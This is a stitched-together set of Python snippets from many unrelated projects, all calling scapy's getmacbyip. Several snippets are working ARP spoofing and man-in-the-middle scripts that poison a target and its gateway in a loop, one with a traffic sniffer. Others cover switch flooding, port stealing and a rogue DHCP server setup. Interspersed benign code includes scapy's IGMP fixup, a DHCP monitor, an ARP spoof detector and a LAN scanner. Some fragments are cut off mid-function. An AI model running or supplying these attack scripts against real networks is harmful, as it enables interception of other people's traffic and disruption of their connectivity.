def exploit(gateway, ip): gmac = getmacbyip(gateway) ipmac = getmacbyip(ip) packet1 = ARP(op=2, pdst=ip, psrc=gateway, hwdst=gmac) packet2 = ARP(op=2, pdst=gateway, psrc=ip, hwdst=ipmac) for pack in [packet1, packet2]: send(pack, verbose=False) return ipmac, gmac
def arpspoof(target='192.168.2.16', host='192.168.2.1', interface='eth2'): while True: pkt_target = Ether() / ARP(op='is-at', psrc=host, pdst=target, hwsrc=get_if_hwaddr(interface), hwdst=getmacbyip(target)) pkt_host = Ether() / ARP(op='is-at', psrc=target, pdst=host, hwsrc=get_if_hwaddr(interface), hwdst=getmacbyip(host)) sendp(pkt_target) sendp(pkt_host) time.sleep(3)
def restore(gateway, ip): packet1 = ARP(op=2, pdst=gateway, psrc=ip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=getmacbyip(ip)) packet2 = ARP(op=2, pdst=ip, psrc=gateway, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=getmacbyip(gateway)) for pack in [packet1, packet2]: send(pack, verbose=False)
def igmpize(self): """Called to explicitly fixup the packet according to the IGMP RFC The rules are: - General: 1. the Max Response time is meaningful only in Membership Queries and should be zero - IP: 1. Send General Group Query to 224.0.0.1 (all systems) 2. Send Leave Group to 224.0.0.2 (all routers) 3a.Otherwise send the packet to the group address 3b.Send reports/joins to the group address 4. ttl = 1 (RFC 2236, section 2) 5. send the packet with the router alert IP option (RFC 2236, section 2) - Ether: 1. Recalculate destination Returns: True The tuple ether/ip/self passed all check and represents a proper IGMP packet. False One of more validation checks failed and no fields were adjusted. The function will examine the IGMP message to assure proper format. Corrections will be attempted if possible. The IP header is then properly adjusted to ensure correct formatting and assignment. The Ethernet header is then adjusted to the proper IGMP packet format. """ from scapy.contrib.igmpv3 import IGMPv3 gaddr = self.gaddr if hasattr(self, "gaddr") and self.gaddr else "0.0.0.0" # noqa: E501 underlayer = self.underlayer if self.type not in [0x11, 0x30]: # General Rule 1 # noqa: E501 self.mrcode = 0 if isinstance(underlayer, IP): if (self.type == 0x11): if (gaddr == "0.0.0.0"): underlayer.dst = "224.0.0.1" # IP rule 1 # noqa: E501 elif isValidMCAddr(gaddr): underlayer.dst = gaddr # IP rule 3a # noqa: E501 else: warning("Invalid IGMP Group Address detected !") return False elif ((self.type == 0x17) and isValidMCAddr(gaddr)): underlayer.dst = "224.0.0.2" # IP rule 2 # noqa: E501 elif ((self.type == 0x12) or (self.type == 0x16)) and (isValidMCAddr(gaddr)): # noqa: E501 underlayer.dst = gaddr # IP rule 3b # noqa: E501 elif (self.type in [0x11, 0x22, 0x30, 0x31, 0x32] and isinstance(self, IGMPv3)): pass else: warning("Invalid IGMP Type detected !") return False if not any(isinstance(x, IPOption_Router_Alert) for x in underlayer.options): # noqa: E501 underlayer.options.append(IPOption_Router_Alert()) underlayer.ttl = 1 # IP rule 4 _root = self.firstlayer() if _root.haslayer(Ether): # Force recalculate Ether dst _root[Ether].dst = getmacbyip(underlayer.dst) # Ether rule 1 # noqa: E501 if isinstance(self, IGMPv3): self.encode_maxrespcode() return True
def main(): len_arg = len(sys.argv) i = 0 flag_help = True while i != len_arg: if sys.argv[i] == '-h': help_function() flag_help = False break i += 1 if flag_help: i = 0 interface = conf.iface while i != len_arg: if sys.argv[i] == '-i': interface = sys.argv[i + 1] break i += 1 source = get_if_addr(conf.iface) i = 0 while i != len_arg: if sys.argv[i] == '-s': source = sys.argv[i + 1] i += 1 i = 0 delay = 0 while i != len_arg: if sys.argv[i] == '-d': delay = sys.argv[i + 1] delay = float(delay) i += 1 gw = False i = 0 while i != len_arg: if sys.argv[i] == '-gw': gw = True i += 1 i = 0 targetIp = "" while i != len_arg: if sys.argv[i] == '-t': targetIp = sys.argv[i + 1] i += 1 gatewayIP = get_gateway_ip() gatewayMAC = getmacbyip(gatewayIP) while True: myMac = get_if_hwaddr(interface) fake_gateway(targetIp, myMac, gatewayIP) if gw: fake_client(targetIp, gatewayIP, myMac, gatewayMAC) time.sleep(delay)
def initialize(self): util.Msg("Starting switch flood...") self.switch = getmacbyip(self.config['target'].value) self.running = True thread = Thread(target=self.spam) thread.start() return True
def fake_gateway(ip, myMac, gatewayIP): # Sends a message to each host in the LAN indicating I'm a gateway. targetMAC = getmacbyip(ip) arp_response = ARP(pdst=ip, hwdst=targetMAC, psrc=gatewayIP, hwsrc=myMac, op='is-at') send(arp_response)
def get_mac(tgt_ip): ''' 调用scapy的getmacbyip函数,获取攻击目标IP的MAC地址。 ''' tgt_mac = getmacbyip(tgt_ip) if tgt_mac is not None: return tgt_mac else: print("无法获取IP为:%s 主机的MAC地址,请检查目标IP是否存活" % tgt_ip)
def igmpize(self): """Called to explicitly fixup the packet according to the IGMP RFC The rules are: General: 1. the Max Response time is meaningful only in Membership Queries and should be zero # noqa: E501 IP: 1. Send General Group Query to 224.0.0.1 (all systems) 2. Send Leave Group to 224.0.0.2 (all routers) 3a.Otherwise send the packet to the group address 3b.Send reports/joins to the group address 4. ttl = 1 (RFC 2236, section 2) 5. send the packet with the router alert IP option (RFC 2236, section 2) # noqa: E501 Ether: 1. Recalculate destination Returns: True The tuple ether/ip/self passed all check and represents a proper IGMP packet. False One of more validation checks failed and no fields were adjusted. The function will examine the IGMP message to assure proper format. Corrections will be attempted if possible. The IP header is then properly # noqa: E501 adjusted to ensure correct formatting and assignment. The Ethernet header # noqa: E501 is then adjusted to the proper IGMP packet format. """ gaddr = self.gaddr if hasattr(self, "gaddr") and self.gaddr else "0.0.0.0" # noqa: E501 underlayer = self.underlayer if self.type not in [0x11, 0x30]: # General Rule 1 # noqa: E501 self.mrcode = 0 if isinstance(underlayer, IP): if (self.type == 0x11): if (gaddr == "0.0.0.0"): underlayer.dst = "224.0.0.1" # IP rule 1 # noqa: E501 elif isValidMCAddr(gaddr): underlayer.dst = gaddr # IP rule 3a # noqa: E501 else: warning("Invalid IGMP Group Address detected !") return False elif ((self.type == 0x17) and isValidMCAddr(gaddr)): underlayer.dst = "224.0.0.2" # IP rule 2 # noqa: E501 elif ((self.type == 0x12) or (self.type == 0x16)) and (isValidMCAddr(gaddr)): # noqa: E501 underlayer.dst = gaddr # IP rule 3b # noqa: E501 else: warning("Invalid IGMP Type detected !") return False if not any(isinstance(x, IPOption_Router_Alert) for x in underlayer.options): # noqa: E501 underlayer.options.append(IPOption_Router_Alert()) _root = self.firstlayer() if _root.haslayer(Ether): # Force recalculate Ether dst _root[Ether].dst = getmacbyip(underlayer.dst) # Ether rule 1 # noqa: E501 from scapy.contrib.igmpv3 import IGMPv3 if isinstance(self, IGMPv3): self.encode_maxrespcode() return True
def getTargetMac(targetIP): targetMac = None for i in range(3): if not targetMac: targetMac = getmacbyip(targetIP) else: print("Target: %s MAC address is %s" % (targetIP, targetMac)) # 返回目标mac值 return targetMac print("Can't get Target:%s MAC address" % targetIP) return None
def initialize(self): try: util.Msg('[enter] for broadcast') self.switch = raw_input('[!] Enter switch address: ') if self.switch == '': self.switch = 'FF:FF:FF:FF:FF:FF' else: self.switch = getmacbyip(self.switch) except: return None self.running = True thread = Thread(target=self.spam) thread.start() return 'Spamming %s'%(self.switch)
def _get_mac_address_of_ip(self, ip_addr: IPAddress): if ip_addr.version == IPAddress.IPV4: ip_str = socket.inet_ntop(socket.AF_INET, ip_addr.address) addr_str = getmacbyip(ip_str) else: ip_str = socket.inet_ntop(socket.AF_INET6, ip_addr.address) addr_str = getmacbyip6(ip_str) if not addr_str: LOG.error("Coudn't find mac for IP: %s, disabling ebpf" % (ip_str)) return None LOG.debug("IP: %s, mac: %s" % (ip_str, addr_str)) return self._pack_mac_addr(addr_str)
def send_packet(self, tcp_packet): with self._lock: interface = Route().route(tcp_packet.destination_ip)[0] ip_packet = IPPacket(source_ip_addr=tcp_packet.source_ip, destination_ip_addr=tcp_packet.destination_ip, payload=tcp_packet.serialize()) ethernet_packet = EthernetPacket( source_mac=get_if_hwaddr(interface), destination_mac=getmacbyip(tcp_packet.destination_ip), protocol=ETH_P_IP, payload=ip_packet.serialize()) self.interface_socket.sendto( ethernet_packet.serialize(), (Route().route(tcp_packet.destination_ip)[0], ETH_P_ALL))
def test_agent_agent_attack(): netcard = 'Broadcom 802.11n 网络适配器' gw_ip = '192.168.123.1' target_ip = '192.168.123.224' temp = get_gw_and_self(netcard, gw_ip) self_ip = temp.get('self_ip') self_mac = temp.get('self_mac') target_mac = getmacbyip(target_ip) gw_mac = temp.get('gw_mac') # 欺骗目标本机为网关 trick_taget = Ether(dst=target_mac, src=self_mac) / ARP( op=2, psrc=gw_ip, hwsrc=self_mac, hwdst=target_mac) # 欺骗网关本机为目标 trick_gateway = Ether(dst=gw_mac, src=self_mac) / ARP( op=2, psrc=target_ip, hwsrc=self_mac, hwdst=gw_mac) t = int(input("请输入攻击时间间隔(秒):")) tricker = MTread('tricker', agent_attack_cell, trick_taget, trick_gateway, t) tricker.start() # threading.Thread mfilter = "!arp and host " + target_ip mprn = lambda pkt: pack(pkt, self_mac, target_mac, gw_mac) # sniffer = MTread('sniffer', snifer_shell, mfilter, mprn) # sniffer.start() threading.Thread(name='sniffer', target=snifer_shell, args=[mfilter, mprn]).start() print("攻击开始,目标ip %s,目标Mac %s" % (target_ip, target_mac)) print('您可输入数字命令控制任务:') print("stop trick: 0, pause trick: 1,resume trick: 2") f0 = 1 # running state while 1: f1 = int(input("cmd(a number): ")) if f0 == 1: # stop or pause if f1 == 1: tricker.pause() f0 = 0 # paused print('tricker已暂停') elif f1 == 0: tricker.stop() # stopped break elif f0 == 0: if f1 == 2: tricker.resume() # resume -> running f0 = 1 print('tricker已恢复') print('已停止')
def run(): if os.geteuid() != 0: print("Root required for operation") sys.exit(1) # Get the native MAC by specified interface native_mac = getmac.get_mac_address(interface) if not native_mac: print("The specified interface does not exist") sys.exit() target_mac = getmacbyip(target_ip) if not target_mac: print("The specified target does not exist") sys.exit() gateway_mac = getmacbyip(gateway_ip) if not gateway_mac: print("The specified gateway does not exist") sys.exit() while 1: try: spoof(native_mac, target_mac, gateway_mac) time.sleep(1.5) except KeyboardInterrupt: restore(target_mac, gateway_mac) break
def getMacAddress(self, ip="0.0.0.0"): try: mac = l2.getmacbyip(ip) if mac == "ff:ff:ff:ff:ff:ff" or mac == "00:00:00:00:00:00": # tested only on Mac OS, and not working pretty well with virtual interfaces, like virtualbox interfaces interface = psutil.net_if_addrs()[ self.comboInterfacesBox.currentText()] for addr in interface: if addr.family == psutil.AF_LINK: return addr.address return psutil.net_if_addrs()[ self.comboInterfacesBox.currentText()][1].address else: return mac except: pass
def run(target, victim, interface): """ This function launch ARP spoof attack in one way :param target: target ip address :type target: str :param victim: victim ip address :type victim: str :param interface: interface to be launched the attack :type interface: str """ tmac = getmacbyip(target) p = Ether(dst=tmac)/ARP(op="who-has", psrc=victim, pdst=target) try: while 1: sendp(p, iface=interface, verbose=0) except KeyboardInterrupt: pass
def run(target, victim, interface): """ This function launch ARP spoof attack in one way :param target: target ip address :type target: str :param victim: victim ip address :type victim: str :param interface: interface to be launched the attack :type interface: str """ tmac = getmacbyip(target) p = Ether(dst=tmac) / ARP(op="who-has", psrc=victim, pdst=target) try: while 1: sendp(p, iface=interface, verbose=0) except KeyboardInterrupt: pass
def __init__(self): self.__GATEWAY_IP = conf.route.route("0.0.0.0")[2] self.__GATEWAY_MAC = getmacbyip(self.__GATEWAY_IP) self.__DHCPServerIp = get_if_addr(conf.iface) self.__DHCPMac = Ether().src self.__dictIPS = {} self.__IPPool = [] self.__fakeDNSServer = "8.8.8.8" self.__fakeSubnetMask = "" self.__fakeGatewayIP = self.__DHCPServerIp self.__leaseTime = 86400 self.__renewalTime = 172800 self.__rebindingTime = 138240 self.__command = ""
def start(ip_target, output_file, interface): mac_target = getmacbyip(ip_target) if mac_target == None: six.print_(colored("[!] ERROR - Can't locate the MAC of that IP", "red")) exit(0) global file file=output_file #Access control file to check if Port stealing is running. Write PID in file if not. control_file = open("control_file", "r+") data=ast.literal_eval(control_file.read()) if data['port_stealing_pid'] == 0: data['port_stealing_pid'] = getpid() overWriteFile(control_file, str(data)) else: six.print_(colored("[!] ERROR - Port Stealing is running", "red")) control_file.close() exit(0) six.print_("[*] Port Stealing STARTED") port_stealing(ip_target, mac_target, interface)
def __init__(self): # 保存扫描结果 self.num = -1 self.result = [] # 网卡 pattern = re.compile('\[.*?\]') self.interFACE = pattern.findall(str(conf.iface))[0].replace( '[', '').replace(']', '') # 靶机 self.target_ip = '192.168.1.4' # 本机ip(攻击机) self.local_ip = get_ip_from_name(self.interFACE) # 网关 self.gate_ip = "192.168.1.1" # 靶机mac self.target_mac = '' # 本机mac self.local_mac = get_if_hwaddr(self.interFACE) # 网关 self.gate_mac = getmacbyip(self.gate_ip)
def getIPAndMac(ip_range): result_list = {} for ip in ip_range: # 打印生成的目标IP print("=检测ip=>", ip) # 根据目标IP组包, ICMP可以看做Ping, 程序员式招呼 p = IP(dst=ip) / ICMP() / b'HelloWorld' # 将数据包发出, 等待0.3秒,无回应则放弃等待, 屏蔽提示消息 r = sr1(p, timeout=0.3, verbose=False) # 如果收到了返回的数据包,则存到一个数组中 try: if r.getlayer(IP).fields['src'] == ip and r.getlayer( ICMP).fields['type'] == 0: net_info = {} mac = l2.getmacbyip(ip) getcom = Mac() com = getcom.search(mac) mac = mac + "|" + str(com) result_list[str(ip)] = mac print("成功获取一个mac地址:", ip, mac) except Exception as e: pass return result_list
def start(self): global socket self.recv_process = multiprocessing.Process( target=self.process_receive) end_time = time.time() + 10 while self.dut_mac == None and time.time() < end_time: self.dut_mac = getmacbyip(self.sut_ip) socket = conf.L2socket(iface=self.sut_interface) self.packet = Ether(dst=self.dut_mac, type=0x6003) if self.dut_mac == None: print("[!] Could not determine target MAC address from IP") sys.exit(1) self.recv_process.start() #self.process_receive() """ sleep - letting sniffing process initialize """ time.sleep(3)
def handle_dhcp_packet(packet): # Match DHCP discover if DHCP in packet and packet[DHCP].options[0][1] == 1: print('---') print('New DHCP Discover') #print(packet.summary()) #print(ls(packet)) hostname = get_option(packet[DHCP].options, 'hostname') mac = packet[Ether].src if check_whitelist(mac): print(f'Whitelisted host {hostname} asked for an IP.') print(f'Host vendor: {mac_vendor.get_str(mac)}') print(f'Host MAC: {mac}') return pal_time() print_and_log(f"Unknown host {hostname} asked for an IP.") print_and_log(f'Host vendor: {mac_vendor.get_str(mac)}') print_and_log(f'Host MAC: {mac}') # Match DHCP ack elif DHCP in packet and packet[DHCP].options[0][1] == 5\ and packet[BOOTP].yiaddr != '0.0.0.0': print('---') print('New DHCP Ack') #print(packet.summary()) #print(ls(packet)) subnet_mask = get_option(packet[DHCP].options, 'subnet_mask') lease_time = get_option(packet[DHCP].options, 'lease_time') router = get_option(packet[DHCP].options, 'router') name_server = get_option(packet[DHCP].options, 'name_server') server_mac = packet[Ether].src server_ip = packet[IP].src sus_ip = packet[BOOTP].yiaddr sus_mac = str(getmacbyip(sus_ip)) sus_vendor = mac_vendor.get_str(sus_mac) if check_whitelist(sus_mac): print( f"DHCP Server {server_ip} ({server_mac}) acknowledged a whitelisted device on IP {sus_ip}" ) print(f'Host vendor: {mac_vendor.get_str(sus_vendor)}') print(f'Host MAC: {sus_mac}\n') return pal_time() print_and_log( f"DHCP Server {server_ip} ({server_mac}) acknowledged unknown device on IP {sus_ip}" ) print_and_log(f'Unknown host vendor: {mac_vendor.get_str(sus_vendor)}') print_and_log(f'Unknown host MAC: {sus_mac}\n') print(f"DHCP Options: subnet_mask: {subnet_mask}, lease_time: " f"{lease_time}, router: {router}, name_server: {name_server}") # Match DHCP inform elif DHCP in packet and packet[DHCP].options[0][1] == 8: print('---') print('New DHCP Inform') #print(packet.summary()) #print(ls(packet)) hostname = get_option(packet[DHCP].options, 'hostname') vendor_class_id = get_option(packet[DHCP].options, 'vendor_class_id') print(f"DHCP Inform from {packet[IP].src} ({packet[Ether].src}) " f"hostname: {hostname}, vendor_class_id: {vendor_class_id}") else: print('---') print('Some Other DHCP Packet') print(packet.summary()) #print(ls(packet)) return
eth = Ether() arp = ARP(psrc=gateway_ip, hwdst=tgt_mac, pdst=tgt_ip, op="is-at") pkt = eth / arp return pkt if __name__ == '__main__': parser = argparse.ArgumentParser(description='man in the middle') parser.add_argument('-t', dest='targetip', type=str, help='target ip') parser.add_argument('-g', dest='gatewayip', type=str, help='gateway ip') args = parser.parse_args() tgt_ip = args.targetip tgt_mac = getmacbyip(tgt_ip) gateway_ip = args.gatewayip gateway_mac = getmacbyip(gateway_ip) input('enter') pkt_station = arp(gateway_ip, tgt_mac, tgt_ip) pkt_gateway = arp(tgt_ip, gateway_mac, gateway_ip) print(pkt_station.show()) print(pkt_gateway.show()) while True: sendp(pkt_station) sendp(pkt_gateway) time.sleep(1)
import sys from scapy.layers.l2 import Ether, ARP, sendp from scapy.layers.l2 import getmacbyip if __name__ == '__main__': if len(sys.argv) < 3: sys.exit(1) target_ip = sys.argv[1] host = sys.argv[2] target_mac = getmacbyip(target_ip) host_mac = getmacbyip(host) pkt = Ether() / ARP( op='is-at', psrc=host, pdst=target_ip, hwdst=target_mac) print(pkt.show()) try: sendp(pkt, inter=2, loop=1) except KeyboardInterrupt: print('Cleaning...') sendp(Ether(src=host_mac) / ARP(op='is-at', psrc=host, hwsrc=host_mac, pdst=target_ip, hwdst=target_mac), inter=1, count=3)
import os import sys from scapy.layers.l2 import getmacbyip from scapy.all import ( Ether, ARP, sendp ) ifconfig=os.system('ifconfig') print ifconfig gmac=raw_input('Please enter gateway IP:') liusheng=raw_input('Please enter your IP:') liusrc=raw_input('Please enter target IP:') try: tg=getmacbyip(liusrc) print tg except Exception , f: print '[-]{}'.format(f) exit() def arpspoof(): try: eth=Ether() arp=ARP( op="is-at", hwsrc=gmac, psrc=liusheng, hwdst=tg, pdst=liusrc ) print ((eth/arp).show())
def check_ip_mac(packet): if packet[ARP].op == 2: proposed_IP = packet[ARP].psrc # print("spoofed") return not (getmacbyip(proposed_IP) == packet[ARP].hwsrc)
from scapy.layers.l2 import getmacbyip from scapy.all import ( Ether, ARP, sendp ) #执行查看IP的命令 ifconfig=os.system('ifconfig') print ifconfig gmac=raw_input('Please enter gateway IP:') liusheng=raw_input('Please enter your IP:') liusrc=raw_input('Please enter target IP:') try: #获取目标的mac tg=getmacbyip(liusrc) print tg except Exception , f: print '[-]{}'.format(f) exit() def arpspoof(): try: eth=Ether() arp=ARP( op="is-at", #arp响应 hwsrc=gmac, #网关mac psrc=liusheng,#网关IP hwdst=tg,#目标Mac pdst=liusrc#目标IP ) #对配置进行输出
def _scapy_ip(ip): """Requires root permissions on POSIX platforms. Windows does not have this limitation.""" from scapy.layers.l2 import getmacbyip return getmacbyip(ip)
def local_scan(): ipl = get_lan_ip() # Local IP print('\nYour local IP is: {}'.format(ipl)) if ip_check_local(ipl) is False: print('Your address does not appear to be from a local network. Aborting scan.') else: x = config.ip_list_setting if x == 3: print('Skipping ping sweep.') print('Scanning all IPs in the last IP octet range (like in a /24 subnet).') ip_list = generate_ips(ipl) elif x == 2: print('Skipping ping sweep.') print('Scanning manually entered IPs.') ip_list = config.manual_ip_list else: print('Ping sweeping the IPs in the last IP octet range (like in a /24 subnet).') ip_list = ping_sweep.get_ip_list(ipl) print(ip_list) data_list = [] open_ports_found = False open_ports = [] print('Scanning for open ports on found hosts...') ports_by_ip = multithread_scan(ip_list, port_scan) print('Acquiring host data...') start_time = time.time() for address in ip_list: mac_addr = str(getmacbyip(address)) # TODO this needs a timeout for optimisation # This means host was unresponsive # It only matters when skipping ping sweep if mac_addr == 'None': continue host_data = socket.gethostbyaddr(address) hostname = host_data[0] # host_data structure is: (name, aliases, [IPs]) vendor = mac_vendor.get_str(mac_addr) ports = get_ports(address, ports_by_ip) ports.sort() ip_data = [ address, hostname, ports, mac_addr, vendor ] data_list.append(ip_data) print("Duration: {} seconds".format(time.time() - start_time)) # TODO sort the data_list print('\nNote: Your host might return ff:ff:ff:ff:ff:ff.\n') # Display hosts with found ports print("{:<15} {:<20} {:<20} {:<35} {}".format('IP', 'Name', 'MAC', 'Vendor', 'List of open ports')) print("{:<15} {:<20} {:<20} {:<35} {}".format('-'*15, '-'*16, '-'*17, '-'*30, '-'*18)) for entry in data_list: print("{:<15} {:<20} {:<20} {:<35} {}".format(entry[0], entry[1], entry[3], entry[4], entry[2])) if len(entry[2]) != 0: open_ports_found = True for port in entry[2]: if port not in open_ports: open_ports.append(port) if open_ports_found: print('\nPorts belonging to potentially vulnerable services have been found on one or more of\n' 'the devices in your local network. Make sure to investigate and close or secure them.') open_ports.sort() print('\nThe services on those ports are:') for port in open_ports: print('─ {} ({})'.format(port, services.get(port))) else: print('\nNo ports belonging to potentially dangerous services have been found.') if open_ports_found: decision = 'Y' # input('Grab banners? Enter Y or n \n') if decision == 'Y': print('Grabbing banners for all services. This might take a minute...') banner_data = multithread_scan(ports_by_ip, banner_grab) #pprint.pprint(banner_data) for row in banner_data: ip_address = row[0] host_data = socket.gethostbyaddr(ip_address) hostname = host_data[0] banner_by_port_list = row[1] print('{} ({})'.format(ip_address, hostname)) for entry in banner_by_port_list: port = entry[0] banner = entry[1] print('\tPort: {}'.format(port)) print('\t\t{}'.format(banner))
def main(): # sniff(filter='icmp', prn=prn) print getmacbyip('192.168.56.16')
def get_mac(tgt_ip): tgt_mac = getmacbyip(tgt_ip) if tgt_mac is not None: return tgt_mac else: print("无法获取IP为:%s 主机的MAC地址,请检查目标IP是否存活" % tgt_ip)
def getway(): c = netifaces.gateways() gate = c["default"][2][0] gate_mac = getmacbyip(gate) return c["default"][2][0], gate_mac